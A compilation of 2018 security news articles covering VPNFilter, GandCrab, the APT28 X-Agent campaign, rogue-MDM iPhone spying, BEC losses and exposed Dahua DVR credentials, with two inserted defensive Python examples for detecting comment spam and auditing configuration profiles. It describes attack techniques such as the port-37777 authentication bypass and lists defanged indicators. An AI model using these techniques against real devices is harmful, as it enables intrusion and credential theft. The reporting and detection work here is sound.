“In line with our approach, we have served Facebook with a Notice setting out the detail of our areas of concern and invited their representations on these and any action we propose.” concludes the ICO update on the investigation published today by Information Commissioner Elizabeth Denham.

“Their representations are due later this month, and we have taken no final view on the merits of the case at this time. We will consider carefully any representations Facebook may wish to make before finalising our views,”

Ukraine’s SBU Security Service reportedly stopped VPNFilter attack at chlorine station
19.7.2018 securityaffairs CyberWar

Ukraine’s SBU Security Service reportedly stopped a VPNFilter attack at a chlorine station; the malware infected the network equipment of the facility, which supplies water treatment and sewage plants.
According to the Interfax-Ukraine media outlet, VPNFilter hit the LLC Aulska station in Auly (Dnipropetrovsk region); according to the experts, the malware aimed at disrupting operations at the chlorine station.

“Specialists of the cyber security service established minutes after [the incident] that the enterprise’s process control system and system for detecting signs of emergencies had deliberately been infected by the VPNFilter computer virus originating from Russia. The continuation of the cyber attack could have led to a breakdown in technological processes and a possible accident,” the SBU said on its Facebook page on Wednesday.

VPNFilter is a multi-stage, modular strain of malware with a wide range of capabilities for both cyber espionage and sabotage purposes.

According to the experts at Fortinet that analyzed the malware, VPNFilter operates in the following three stages:

Stage 1 implements a persistence mechanism and redundancy; it allows the malware to survive a reboot.
Stage 2 includes data exfiltration, command execution, file collection, and device management. A self-destruct module is present only in some versions.
Stage 3 includes multiple modules that perform different tasks. At the time, researchers had identified only three modules:
  a packet sniffer for traffic analysis and potential data exfiltration;
  the monitoring of MODBUS SCADA protocols;
  communication with obfuscated addresses via TOR.
The main concern is the self-destruct mode, which could cause severe damage across all infected devices simultaneously, a feature that could potentially result in a widespread Internet outage over a targeted geographic region.

Technical analysis of the code revealed many similarities with another nation-state malware, BlackEnergy, which was specifically designed to target ICS/SCADA systems and is attributed to Russian threat actors.

Another similarity is the geographic distribution of the infections, both BlackEnergy and VPNFilter infected a large number of devices in Ukraine.


According to the experts, many infected devices have been discovered in Ukraine, and their number in the country continues to increase. On May 8, Talos researchers observed a spike in VPNFilter infection activity, with most infections in Ukraine and the majority of compromised devices contacting a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware had infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

When the botnet was first discovered, the US Justice Department seized a domain used as part of its command and control infrastructure; the DoJ press release explicitly named the Russian APT groups (APT28, Pawn Storm, Sandworm, Fancy Bear and the Sofacy Group) as the operators behind the huge botnet.

“The Justice Department today announced an effort to disrupt a global botnet of hundreds of thousands of infected home and office (SOHO) routers and other networked devices under the control of a group of actors known as the “Sofacy Group” (also known as “apt28,” “sandworm,” “x-agent,” “pawn storm,” “fancy bear” and “sednit”),” reads the press release published by the DoJ.

“The SBU said its agents together with a telecoms provider and workers of the station managed to prevent a potential man-made disaster, adding Russia special forces were behind cyber attacks with the same virus on the public and private sectors in May 2018.” concluded Interfax-Ukraine.

Spambot targets WordPress sites in World Cup-themed spam scam
19.7.2018 securityaffairs

Imperva observed a spambot targeting WordPress sites, aimed at tricking victims into clicking on links to sites offering betting services on the FIFA World Cup.
Security experts from Imperva recently observed a spike in spam activity directed at WordPress websites; the attackers aim to trick victims into clicking on links to sites offering betting services on the 2018 FIFA World Cup games.
Imperva monitored the activity of a botnet used to post meaningless, template-generated text to the comment sections of blogs, news articles, and other websites that allow people to comment.

“Turns out the attack was launched by a botnet and implemented in the form of comment SPAM – meaningless, generic text generated from a template and posted in the comment sections of blogs, news articles etc; linking to pay-per-click commercial or suspicious sites looking to scam you or phish for your passwords.” reads the report published by Imperva.

The spambot was used to post comments to the same Uniform Resource Identifier (URI) across different WordPress sites indiscriminately, without regard for whether the site has a comments section or is affected by known exploitable issues.

The comments are generated from a template that has been known since at least 2013. The template allows the bot to automatically create slightly different versions of the same message for use in spam campaigns.

“Our analysis found that the top 10 links advertised by the botnet lead to World Cup betting sites. Interestingly, eight of the top advertised sites contained links to the same betting site, hinting that they might be connected in a way.” continues Imperva.


“We found that the botnet advertised over 1000 unique URLs, most of them appear multiple times. In many cases, the botnet used different techniques such as URL redirection and URL-shortening services to mask the true destination of the advertised link.”

According to the experts, the spambot is still small: it is composed of just 1,200 unique IPs, with up to 700 unique IPs active daily. The experts found that the botnet has also been using URL shortening, URL redirection, and other techniques to mask the landing sites of the links advertised in its spam messages.

In the weeks before the World Cup, the spambot was being used in remote code execution attacks and other non-spam attacks on WordPress sites.


Just after the 2018 World Cup began, the botnet’s activity shifted to comment spam, a circumstance that suggests the malicious infrastructure is available for hire.

“A possible explanation is that the botnet is for hire. The malicious activity we’ve seen at first was either paid for or simply the botnet’s attempt to grow itself. Then, it was hired by these betting sites to advertise them and increase their SEO.” continues the analysis.

Comment spam is a well-known activity in the threat landscape; the most common countermeasure is to blacklist the IPs that originate spam messages and also the URLs they advertise.

WordPress also has several plug-ins that can block this nuisance.
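The two countermeasures described above (recognising template-generated comment text, and blacklisting the advertised URLs) can be combined into a small triage script. This is an added example, not Imperva’s code; the template renderings, blocklist, host names and comment events are constructed for illustration.

```python
"""Comment-spam triage for a WordPress-style comment feed.

Added example, not Imperva's code. It applies the two countermeasures the
article mentions: recognising templated ("spun") comment text by word-shingle
similarity to known template renderings, and flagging advertised URLs that hit
a blocklist or hide behind a URL shortener. It also counts how many distinct
IPs hit one URI, the burst pattern described above. All data is constructed.
"""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

# Constructed renderings of a hypothetical spintax template; a real deployment
# would collect these from previously quarantined comments.
KNOWN_TEMPLATE_RENDERINGS = [
    "Hi there! I simply want to give you a huge thumbs up for your great info "
    "you have got here on this post. I will be returning to your site for more soon.",
    "Hello! I just want to give you a big thumbs up for the excellent information "
    "you have here on this post. I'll be coming back to your website for more soon.",
]

# Constructed blocklist of advertised hosts and a few well-known shortener hosts.
URL_BLOCKLIST = {"worldcup-bets.example", "bet-now.example"}
SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "goo.gl", "t.co"}


def normalize(text):
    """Lowercase, drop URLs and punctuation, return the word list."""
    return re.findall(r"[a-z0-9']+", URL_RE.sub(" ", text.lower()))


def shingles(words, k=3):
    """Word k-grams; most of them survive the single-word swaps a template makes."""
    if len(words) < k:
        return {tuple(words)} if words else set()
    return {tuple(words[i:i + k]) for i in range(len(words) - k + 1)}


def jaccard(a, b):
    return len(a & b) / len(a | b) if a and b else 0.0


def template_similarity(text, renderings=KNOWN_TEMPLATE_RENDERINGS):
    """Highest Jaccard similarity between the comment and any known rendering."""
    s = shingles(normalize(text))
    return max((jaccard(s, shingles(normalize(r))) for r in renderings), default=0.0)


def url_flags(url):
    """Reasons to distrust one advertised URL (empty list means none found)."""
    host = (urlparse(url).hostname or "").lower()
    flags = []
    if host in URL_BLOCKLIST:
        flags.append("blocklisted-host")
    if host in SHORTENER_HOSTS:
        flags.append("shortener")  # destination is masked; resolve it before allowing
    return flags


def triage_comment(text, threshold=0.3):
    """Classify one comment; 'spam' is True on a template match or a bad URL."""
    sim = template_similarity(text)
    flagged = {u: url_flags(u) for u in URL_RE.findall(text) if url_flags(u)}
    return {"template_similarity": round(sim, 3), "flagged_urls": flagged,
            "spam": sim >= threshold or bool(flagged)}


def burst_by_uri(events, min_ips=3):
    """URI -> distinct source IP count, for URIs hit by at least min_ips addresses.

    The bot posts one template to the same URI from many IPs at once; a genuine
    discussion rarely draws that many distinct addresses to one post in a burst.
    """
    by_uri = {}
    for ev in events:
        by_uri.setdefault(ev["uri"], set()).add(ev["ip"])
    return {uri: len(ips) for uri, ips in by_uri.items() if len(ips) >= min_ips}


# Constructed sample comment events (RFC 5737 documentation addresses).
SAMPLE_EVENTS = [
    {"ip": "203.0.113.10", "uri": "/2018/07/final-preview/",
     "text": "Hi there! I simply want to give you a big thumbs up for the great info "
             "you have got here on this post. I will be returning to your website "
             "for more soon. http://bit.ly/wc2018"},
    {"ip": "203.0.113.11", "uri": "/2018/07/final-preview/",
     "text": "Hello! I just want to give you a huge thumbs up for the excellent info "
             "you have here on this post. I'll be coming back to your site for more "
             "soon. https://worldcup-bets.example/odds"},
    {"ip": "203.0.113.12", "uri": "/2018/07/final-preview/",
     "text": "Great piece, nice thumbs up from me. http://tinyurl.com/wcbets"},
    {"ip": "198.51.100.7", "uri": "/2018/07/final-preview/",
     "text": "Great analysis of the midfield rotation, the sixtieth minute "
             "substitution changed the whole game."},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["ip"], triage_comment(ev["text"]))
    print("bursts:", burst_by_uri(SAMPLE_EVENTS))
```

The third sample is caught by the URL rule alone, which is why the two checks are kept independent rather than folded into one score.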

“Although comment SPAM has been with us for more than a decade — and doesn’t seem like it’s going away anytime soon — there are numerous solutions ranging from dedicated plugins that block comments that look SPAMmy, to WAF services.” concluded Imperva.

Mobile Malware Campaign targets users in India through rogue MDM service
19.7.2018 securityaffairs

The Talos team has uncovered a “highly targeted” campaign leveraging mobile malware distributed through a bogus MDM service.
Security experts from the Talos team have uncovered a “highly targeted” campaign leveraging mobile malware that has been active since at least August 2015. The researchers believe the cyberspies are operating from China and found them spying on 13 selected iPhones in the same country.

Attackers were abusing a mobile device management (MDM) service that normally allows large enterprises to control devices being used by the employees and enforce policies.

Access to the MDM service used by a company could allow an attacker to control employees’ devices and deploy malware on the targeted devices.


“Cisco Talos has identified a highly targeted campaign against 13 iPhones which appears to be focused on India. The attacker deployed an open-source mobile device management (MDM) system to control enrolled devices.” reads the analysis published by Cisco Talos.

“At this time, we don’t know how the attacker managed to enroll the targeted devices. Enrollment could be done through physical access to the devices, or most likely by using social engineering to entice a user to register.”

Enrolling an iOS device into an MDM service requires the user to manually install an enterprise development certificate. Enterprises can obtain such certificates through the Apple Developer Enterprise Program.

An enterprise can deliver the MDM configuration file through email or a web page for over-the-air enrollment, or by using the Apple Configurator.

“MDM uses the Apple Push Notification Service (APNS) to deliver a wake-up message to a managed device. The device then connects to a predetermined web service to retrieve commands and return results,” reads Apple about MDM.
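Because enrollment hinges on the user accepting a configuration profile, a defender can audit that profile before it is installed. The following added example (not Cisco Talos’ or Apple’s code) parses an unsigned .mobileconfig with plistlib, finds the MDM payload, and reports enrollment targets outside an allowlist plus any bundled root certificate; the allowlist, the sample profile, its host names and UUID are constructed placeholders.

```python
"""Audit an Apple configuration profile (.mobileconfig) before enrolling.

Added example, not Cisco Talos' or Apple's code. It parses the profile plist,
locates the MDM payload and any root-certificate payload, and reports
enrolment targets that are not the organisation's own MDM server. The
allowlist and the sample profile are constructed for illustration.
"""
import plistlib
from urllib.parse import urlparse

# Constructed: hosts the organisation's real MDM is known to use.
ALLOWED_MDM_HOSTS = {"mdm.corp.example"}

# Apple documents AccessRights as a bitmask whose full value is 8191.
ALL_ACCESS_RIGHTS = 8191

# Constructed sample profile in the shape Apple documents: a top-level
# Configuration payload whose PayloadContent holds one payload per type.
SAMPLE_PROFILE = {
    "PayloadType": "Configuration",
    "PayloadIdentifier": "com.example.enroll",
    "PayloadDisplayName": "Device Support Profile",
    "PayloadContent": [
        {
            "PayloadType": "com.apple.mdm",
            "PayloadIdentifier": "com.example.enroll.mdm",
            "ServerURL": "https://mdm.attacker-controlled.example/mdm",
            "CheckInURL": "https://mdm.attacker-controlled.example/checkin",
            "Topic": "com.apple.mgmt.External.PLACEHOLDER",
            "AccessRights": 8191,
            "IdentityCertificateUUID": "PLACEHOLDER-UUID",
        },
        {
            "PayloadType": "com.apple.security.root",
            "PayloadIdentifier": "com.example.enroll.ca",
            "PayloadContent": b"PLACEHOLDER-DER-BYTES",
        },
    ],
}


def dump_profile(profile):
    """Serialise a profile dict to XML plist bytes (what an unsigned file holds)."""
    return plistlib.dumps(profile)


def load_profile(data):
    """Parse an unsigned .mobileconfig; signed ones are CMS-wrapped and must be
    unwrapped (e.g. with openssl smime) before this will parse them."""
    return plistlib.loads(data)


def audit_profile(profile):
    """Return the MDM hosts, root-cert count and findings for one profile."""
    findings, mdm_hosts, root_certs = [], [], 0
    for payload in profile.get("PayloadContent", []):
        ptype = payload.get("PayloadType", "")
        if ptype == "com.apple.mdm":
            for key in ("ServerURL", "CheckInURL"):
                url = payload.get(key)
                if not url:
                    continue
                parsed = urlparse(url)
                host = (parsed.hostname or "").lower()
                mdm_hosts.append(host)
                if parsed.scheme != "https":
                    findings.append(f"{key} is not https: {url}")
                if host not in ALLOWED_MDM_HOSTS:
                    findings.append(f"{key} points at unapproved MDM host {host}")
            # A fully set mask hands the server every management right,
            # including app installation, which is what a rogue MDM wants.
            if payload.get("AccessRights", 0) >= ALL_ACCESS_RIGHTS:
                findings.append("MDM payload requests all AccessRights")
        elif ptype == "com.apple.security.root":
            root_certs += 1  # a new trust anchor rides along with enrolment
    if root_certs:
        findings.append(f"profile installs {root_certs} root certificate(s)")
    return {"mdm_hosts": mdm_hosts, "root_certificates": root_certs,
            "findings": findings, "safe": not findings}


if __name__ == "__main__":
    report = audit_profile(load_profile(dump_profile(SAMPLE_PROFILE)))
    for line in report["findings"]:
        print("FINDING:", line)
    print("safe to install:", report["safe"])
```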

Cisco’s Talos experts believe the attackers either used social engineering techniques, such as a fake tech-support call, or gained physical access to the targeted devices in some way.

The threat actors behind this campaign used the BOptions sideloading technique to inject malicious code into legitimate apps, including the messaging apps WhatsApp and Telegram, which were then deployed through the MDM service onto the 13 targeted devices in India.

The BOptions sideloading technique allowed the attacker to inject into the application a dynamic library that implements the spyware capabilities. The malicious code allows the attacker to collect and exfiltrate information from the targeted device, including the phone number, serial number, location, contacts, the user’s photos, SMS messages, and Telegram and WhatsApp chat messages.

It is still a mystery how attackers tricked victims into installing a certificate authority on the iPhone and how they added the 13 targeted iPhones into their rogue MDM service.

Exfiltrated data and information about the compromised devices were sent to a remote server located at hxxp[:]//techwach[.]com

Among the tainted apps used by the attackers, there was also PrayTime, an application that notifies users when it is time to pray.

“Talos identified another legitimate app executing malicious code during this campaign in India. PrayTime is used to give the user a notification when it’s time to pray,” continues the analysis.

“The purpose is to download and display specific ads to the user. This app also leverages private frameworks to read the SMS messages on the device it is installed on and uploads these to the C2 server.”

Talos was not able to attribute the attack to a specific actor or to determine its motivations; the researchers found only evidence suggesting the attackers were operating from India. They also noticed that the attackers planted a “false flag” by posing as a Russian threat actor.

“The certificate was issued in September 2017 and contains an email address located in Russia. Our investigation suggests that the attacker is not based out of Russia. We assume this is a false flag to point researchers toward the idea of a “classical Russian hacker.” False flags are becoming more common in malware, both sophisticated and simple. It’s an attempt to muddy the waters for the analysts/researchers to direct blame elsewhere.” continues the analysis.

Talos shared its findings with Apple that quickly revoked 3 certificates used in this campaign.

Further details, including IoCs, are reported in the analysis shared by Talos.

12 Russian Intel Officers charged with hacking into U.S. Democrats
19.7.2018 securityaffairs BigBrothers

The week closes with the indictment for twelve Russian intelligence officers by a US grand jury. The charges were formulated just three days before President Donald Trump is scheduled to meet with Vladimir Putin.
Special Counsel Robert Mueller, who in February indicted 13 Russians for a massive operation aimed at influencing the 2016 Presidential election, has now charged 12 Russian intelligence officers working under the GRU with carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein announced the indictment at a press conference in Washington.

“There’s no allegation in this indictment that any American citizen committed a crime,” said Rosenstein. “The conspirators corresponded with several Americans during the course of the conspiracy through the internet.”

However, “there’s no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers,”

During the news conference, the Deputy Attorney General Rod Rosenstein described the technical details of the operations conducted by the units of Russia’s GRU intelligence agency. The cyberspies stole emails from the Democratic National Committee and Hillary Clinton’s campaign, then leaked them in ways meant to influence the perception of Americans about the Presidential election.

Rosenstein described a second operation in which the officers targeted election infrastructure and local election officials. The Russian intelligence officers set up servers in the U.S. and Malaysia under fake names to run their operations, and they paid for them with cryptocurrency that had been “mined” under their direction.

“The fine details of Russian intelligence operations — the names of officers, the buildings where they worked and the computers they used to run phishing operations and make payments — suggest that prosecutors had an inside view aided by their own or another government’s intelligence apparatus.” reads an article published by Bloomberg.

Rosenstein also remarked that “there’s no allegation that the conspiracy changed the vote count or affected any election result.”

Rosenstein also announced that Trump was informed about the indictment before the announcement and that the timing was determined by “the facts, the evidence, and the law.”

The Deputy Attorney General confirmed that 11 of the Russians indicted were charged with “conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.”

“One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections,” he added.

“The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016,”

“They also hacked into the computer networks of a congressional campaign committee and a national political committee.”

The Democratic minority in Congress is pressing Trump to cancel the meeting with Putin, arguing that Putin intentionally interfered with the election to help Trump’s presidential campaign.

“These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win,” Senator Chuck Schumer, the Democratic Senate minority leader said in a statement.

“President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won’t interfere in future elections,”

Speaking on Friday, before the indictments were announced, Trump explained that he would ask Putin about the alleged interference of Russian intelligence in the Presidential election.

“I will absolutely, firmly ask the question, and hopefully we’ll have a good relationship with Russia,” Trump told a joint press conference with British Prime Minister Theresa May.

Trump described the Mueller investigation as a “rigged witch hunt,” and added that he has been “tougher on Russia than anybody.”

“We have been extremely tough on Russia,”

The White House tweeted on Jul 13, 2018: “At a press conference with U.K. Prime Minister @theresa_may, President @realDonaldTrump made it clear: "We have been far tougher on Russia than anybody."”

Trump evidently believes that the hostility against Russia is a severe interference with the relationship and the collaboration between the two states.

Russia denies any involvement in the elections, and the Kremlin expelled 60 intelligence officers from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

No Americans were charged Friday, but the indictment reports unidentified Americans were in contact with the Russian intelligence officers.

According to the indictment, at least one person close to the Trump campaign and a candidate for Congress were in contact with the Russian officers.

A few days after the discovery of GandCrab ransomware v4.0, experts found version 4.1
19.7.2018 securityaffairs

Security experts from Fortinet recently detected a new version of the GandCrab ransomware, v4.1, that is being distributed through compromised websites.
A few days ago, I wrote about the return of the GandCrab ransomware (v4), a new version appeared in the threat landscape and experts at BleepingComputer first reported it.

GandCrab ransomware is a young threat: it first appeared in the wild early this year, but it evolved rapidly and its authors improved it over the months. As of March, the ransomware had infected over 50,000 systems and netted its operators over $600,000 in ransom payments.
Security experts from Fortinet recently detected a new version of the threat, the GandCrab ransomware 4.1 that is being distributed through compromised websites designed to appear like download sites for cracked applications.

Like GandCrab version 4, the new variant uses the Salsa20 stream cipher to encrypt data instead of the RSA-2048 encryption used in early versions of the threat.

The code of the latest variant, 4.1, includes a list of websites to which the malware connects to send data about the infected machine (i.e. IP address, username, computer name, network domain and, if present, a list of anti-malware tools on the system).

“Only two days after the release of GandCrab 4.0, FortiGuard Labs found a newer version (v4.1) being distributed using the same method, which is through compromised websites disguised as download sites for cracked applications.” reads the analysis published by Fortinet.

“With this new version, GandCrab has added a network communication tactic that was not observed in the previous version.”


Why does the new variant send data to a large number of websites?

According to Fortinet, there is no evidence that the websites in the hard-coded list have actually been compromised; this suggests the malware authors are either testing the functionality or have added it as a diversionary tactic.

“However, we found no definitive evidence that the hard-coded websites included in the malware had actually ever been compromised to act as servers or download sites for GandCrab.” continues the analysis.

“Even more curious, the fact is that sending victim information to all live hosts in the list is illogical in a practical sense, given that a single successful send would have been enough for its purposes. With these points in mind, we have started to think that this function is either experimental, or simply there to divert analysis and that the URLs included in the list are just victims of a bad humour.”

The analysis of the ransomware revealed that GandCrab 4.1 kills numerous processes that could interfere with file encryption. For example, it kills msftesql.exe, sqlagent.exe, oracle.exe, msaccess.exe, powerpnt.exe and wordpad.exe so that it can encrypt high-value files held open by popular applications, such as Microsoft Office files, Steam, Oracle, etc.

The experts from Fortinet highlighted that there is no evidence that GandCrab 4.1 is able to spread via SMB shares as WannaCry and Petya/NotPetya did.

“Over the past few days, numerous reports have been circulating claiming that this version of the GandCrab malware can self-propagate via an “SMB exploit”” continues the analysis.


“However, in spite of this string, we could not find any actual function that resembles the reported exploit capability. (It may also be relevant to report that this string was actually first found in v4.0 and not in v4.1, at least in the samples that we have analysed.) Since this string is not connected to any actual exploit spreading function that we could uncover, it seems much more likely that it is simply referring to the encryption of network shares, and not for any sort of exploit propagation.”

In summary, the threat continues to evolve, but it cannot yet spread via SMB shares.

FBI: Overall BEC/EAC losses between Oct 2013 and May 2018 amount to $12 billion
19.7.2018 securityaffairs BigBrothers

The number of business email compromise (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.
The FBI provided further data on email account compromise: according to the feds, the number of business email compromise (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.

“Business E-mail Compromise (BEC)/E-mail Account Compromise (EAC) is a sophisticated scam targeting both businesses and individuals performing wire transfer payments.” reads the announcement published by the FBI.

“The scam is frequently carried out when a subject compromises legitimate business e-mail accounts through social engineering or computer intrusion techniques to conduct unauthorized transfers of funds.”

The number of BEC/EAC scams continues to grow and the techniques adopted by scammers are evolving, targeting small, medium and large businesses as well as personal transactions.

Unfortunately, business email compromise (BEC) and email account compromise (EAC) scam losses worldwide increased by 136% from December 2016 to May 2018.
Overall losses between October 2013 and May 2018 amount to $12 billion.

According to the FBI, the number of scam incidents in the US was 41,058, resulting in $2.9 billion in losses. The feds highlighted that most of the fraudulent transfers went to banks in China and Hong Kong as recipients of the fraudulent funds.

The authorities observed that banks in the United Kingdom, Mexico, and Turkey have also been identified recently as prominent destinations for fraudulent funds.

“The scam may not always be associated with a request for transfer of funds. A variation of the scam involves compromising legitimate business e-mail accounts and requesting Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees,” reads the announcement published by the FBI.

Scammers appear very focused on organizations in the real estate industry: from 2015 to 2017, the number of BEC/EAC victims in that sector increased by 1,100%.

“Victims most often report a spoofed e-mail being sent or received on behalf of one of these real estate transaction participants with instructions directing the recipient to change the payment type and/or payment location to a fraudulent account. The funds are usually directed to a fraudulent domestic account which quickly disperse through cash or check withdrawals.” continues the announcement.

“The funds may also be transferred to a secondary fraudulent domestic or international account. Funds sent to domestic accounts are often depleted rapidly making recovery difficult.”

Below the BEC/EAC statistics that were shared by the FBI:

Domestic and international incidents: 78,617
Domestic and international exposed dollar loss: $12,536,948,299
The following BEC/EAC statistics were reported in victim complaints where a country was identified to the IC3 from October 2013 to May 2018:
Total U.S. victims: 41,058
Total U.S. exposed dollar loss: $2,935,161,457
Total non-U.S. victims: 2,565
Total non-U.S. exposed dollar loss: $671,915,009
The following BEC/EAC statistics were reported by victims via the financial transaction component of the IC3 complaint form, which became available in June 2016. The following statistics were reported in victim complaints to the IC3 from June 2016 to May 2018:
Total U.S. financial recipients: 19,335
Total U.S. financial recipients exposed dollar loss: $1,629,975,562
Total non-U.S. financial recipients: 11,452
Total non-U.S. financial recipients exposed dollar loss: $1,690,788,278

According to a report published by Trend Micro in January 2018, Business Email Compromise (BEC) losses to enterprises have surpassed those of past years, and they were estimated to reach $9 billion in 2018.

Trump might ask Putin to extradite the 12 Russian intelligence officers
19.7.2018 securityaffairs BigBrothers

A few hours before the upcoming meeting between Donald Trump and Vladimir Putin, the US President said he might ask for the extradition to the US of the 12 Russian intelligence officers accused of involvement in attacks against the 2016 presidential election.
Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask for the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Trump will meet Putin in Finland, despite calls from Democratic lawmakers to cancel the summit in light of the indictments.

Journalists asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and he replied:

“Well, I might.” Trump said

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Trump acknowledged that Russian hackers targeted the 2016 presidential election, but denied that they did so to support his campaign; he added that his Republican Party had also been targeted by Russian hackers.

“I think the DNC (Democratic National Committee) should be ashamed of themselves for allowing themselves to be hacked,” he said. “They had bad defenses and they were able to be hacked. But I heard they were trying to hack the Republicans too. But — and this may be wrong — but they had much stronger defenses.”

The President blamed the DNC for poor security of its systems.

“The President then placed blame on Democrats for “allowing” the data and security breaches that led to Russia’s tampering in the election, saying the Democratic National Committee was ill-equipped to handle a cyberattack from a foreign actor. The Republican National Committee, on the other hand, had “much better defenses,” Trump claimed.” reported CNN.
“They were doing whatever it was during the Obama administration,” Trump said of the Russians. “And I heard that they were trying, or people were trying, to hack into the RNC too, the Republican National Committee, but we had much better defenses. I’ve been told that by a number of people, we had much better defenses so they couldn’t. I think the DNC should be ashamed of themselves for allowing themselves to be hacked. They had bad defenses, and they were able to be hacked, but I heard they were trying to hack the Republicans too, but, and this may be wrong, but they had much stronger defenses.”

The attempted hacking of “old emails” of the Republican National Committee was first reported by CNN in January 2017, quoting then-FBI Director James Comey.

Comey told a Senate panel that “old emails” of the Republican National Committee had been the target of hacking, but the material was never publicly released. Comey confirmed that there was no evidence the current RNC or the Trump campaign had been successfully hacked.

Trump admitted that he was going to meet Putin with “low expectations.”

“I’m not going with high expectations,” he added.

“I think it’s a good thing to meet,” he said. “I believe that having a meeting with Chairman Kim was a good thing. I think having meetings with the president of China was a very good thing.”

“I believe it’s really good. So having meetings with Russia, China, North Korea, I believe in it. Nothing bad is going to come out of it, and maybe some good will come out.”

Update CSE Malware ZLab – Operation Roman Holiday – Hunting the Russian APT28
19.7.2018 securityaffairs APT

Researchers from the Z-Lab at CSE Cybsec analyzed a new collection of malware allegedly part of a new espionage campaign conducted by the APT28 group.
It was a long weekend for the researchers from the Z-Lab at CSE Cybsec, who completed the analysis of a number of payloads that are part of a new cyber espionage campaign conducted by the Russian APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium).

The last time experts attributed an ongoing campaign to APT28 was in June, when researchers from Palo Alto Networks noticed that the group was using new tools in a recent string of attacks.

Palo Alto Networks explained that the APT group had shifted its focus from NATO member countries and Ukraine towards the Middle East and Central Asia.

The researchers observed several attacks leveraging the SPLM and the Zebrocy tool between the second and fourth quarters of 2017 against organizations in Asia. The list of targeted countries included China, Mongolia, South Korea and Malaysia.

While conducting ordinary threat intelligence activities, experts at Z-Lab at CSE Cybsec have recently discovered a new series of malware samples that were submitted to the major online sandboxes.

In particular, they noticed a malware sample submitted to Virus Total that was attributed by some experts to the Russian APT28 group.

The APT28 group has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 US presidential election.

With the help of the researcher who uses the Twitter handle Drunk Binary (@DrunkBinary), researchers from Z-Lab obtained a collection of samples to compare with the one uploaded to VirusTotal.

The analysis revealed that it was a new variant of the infamous APT28 backdoor tracked as X-Agent, in particular a new Windows version that appeared in the wild in June.

The attack analyzed by CSE Cybsec is multi-stage: the experts discovered an initial dropper written in Delphi (a language used by APT28 in other campaigns) that downloads a second-stage payload from the Internet and executes it.


The payload communicates with its server over HTTPS, so the malicious traffic cannot be inspected by passive network monitoring unless TLS is terminated or intercepted at the perimeter; detection therefore has to rely on the endpoint or on the destination (domain, certificate, IP address) rather than on the content of the exchange.

The experts also analyzed another malicious DLL, apparently unrelated to the previous samples, that presents many similarities with other payloads attributed to the Russian APT group.

This malware immediately caught the attention of the experts because it contacts a C2 named “marina-info.net”, a clear reference to the Italian Navy, the Marina Militare. This led them to believe that the malicious code was developed as part of targeted attacks against the Marina Militare or other entities associated with it.

This last DLL seems to be completely unconnected with the previous samples, but further investigation leads the experts into believing that it was an additional component used by APT28 in this campaign to compromise the target system.

APT28 has a rich arsenal composed of a large number of modular malware, and the DLL is a component of the X-Agent variant dissected by Z-Lab.

X-Agent is a persistent payload injected into the victim machine; it can be compiled for almost any operating system and can be extended with new ad-hoc components developed for a specific attack.

In this case, the component was submitted to online sandboxes while the new campaign was ongoing. The experts cannot exclude that the APT group developed the backdoor to target specific organizations including the Italian Marina Militare or any other subcontractor. In their analysis, the experts were not able to directly connect the malicious dll file to the X-Agent samples, but they believe they are both parts of a well-coordinated surgical attack powered by APT28 tracked by Z-Lab as Roman Holiday because it targeted Italian organizations in the summertime.

The DLL that connects to “marina-info.net” might be the last-stage malware, triggered only when particular conditions occur, for example when the malware infects a system with an IP address in specific ranges.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara rules, are available in the report published by the researchers at Z-Lab.

ZoomEye IoT search engine cached login passwords for tens of thousands of Dahua DVRs
19.7.2018 securityaffairs IoT

A security researcher discovered that the IoT search engine ZoomEye has cached login passwords for tens of thousands of Dahua DVRs.
The IoT search engine ZoomEye has cached login passwords for tens of thousands of Dahua DVRs, the discovery was made by security researcher Ankit Anubhav, Principal Researcher at NewSky Security.

Dahua DVRs

Anubhav explained that the passwords are related to Dahua DVRs running very old firmware that is known to be affected by a five-year-old vulnerability tracked as CVE-2013-6117.

Even if the vulnerability has been patched, many Dahua devices are still running ancient firmware.

CVE-2013-6117 was discovered by security expert Jake Reynolds and affects Dahua DVR firmware 2.608.0000.0 and 2.608.GV00.0. The flaw could be exploited by remote attackers to bypass authentication and obtain sensitive information including user credentials, change user passwords, clear log files, and perform other actions via a request to TCP port 37777.

An attacker only needs to open a raw TCP connection to port 37777 on a vulnerable Dahua DVR and send the exploit code that triggers the issue.

Once the Dahua device receives this code, it responds with the DDNS credentials for accessing the device, and other data, all in plaintext.

Ankit Anubhav
Just to make things clear to weaponize the exploit, one needs to connect to port 37777 on raw TCP + send the following message to get the ddns creds


Ankit Anubhav
Wow and how did I miss this.
13900+ of these devices have their password as "123456"
Check here https://goo.gl/S5G2Bh #iot #security #fail

This specific case was brought to my attention by another known botnet operator. So again, RIP to these devices. https://twitter.com/ankit_anubhav/status/1017429425602822144

11:49 PM - Jul 13, 2018

Ankit Anubhav
Replying to @ankit_anubhav
